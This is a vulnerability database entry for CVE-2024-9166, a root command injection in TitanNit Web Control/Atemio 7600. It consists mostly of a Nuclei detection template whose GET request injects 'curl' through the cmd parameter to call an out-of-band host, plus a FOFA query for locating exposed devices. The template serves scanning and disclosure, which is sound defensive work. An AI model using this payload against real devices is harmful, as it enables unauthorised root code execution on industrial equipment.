漏洞描述
The device contains a command injection caused by the 'getcommand' query in the application, letting unauthorized attackers execute system commands with root privileges, exploit requires attacker to send crafted requests.
CVE-2024-9166: TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution
PoC代码[已公开]
id: CVE-2024-9166
info:
name: TitanNit Web Control 2.01/Atemio 7600 - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
The device contains a command injection caused by the 'getcommand' query in the application, letting unauthorized attackers execute system commands with root privileges, exploit requires attacker to send crafted requests.
reference:
- https://www.cisa.gov/news-events/ics-advisories/icsa-24-270-03
- https://www.exploit-db.com/exploits/51853
- https://github.com/Andrysqui/CVE-2024-9166
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5801.php
classification:
cve-id: CVE-2024-9166
cwe-id: CWE-78
epss-score: 0.01755
epss-percentile: 0.81994
metadata:
verified: true
max-request: 1
fofa-query: title="TitanNit Web Control"
tags: cve,cve2024,titanit,web-control,oast,rce,ics,vuln
http:
- raw:
- |
@timeout: 20s
GET /query?getcommand=&cmd=curl+http://{{interactsh-url}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
- type: word
part: body
words:
- "titan.css"
# digest: 490a0046304402205c0843345bbb3be2960bdd9182561e9617c8cd30f593be87933086c38c25f74d0220313c71d681a827d8886b8f1abcfeb8d4e8851393498ce9d1829e677e73aea956:922c64590222798bb761d5b6d8e72950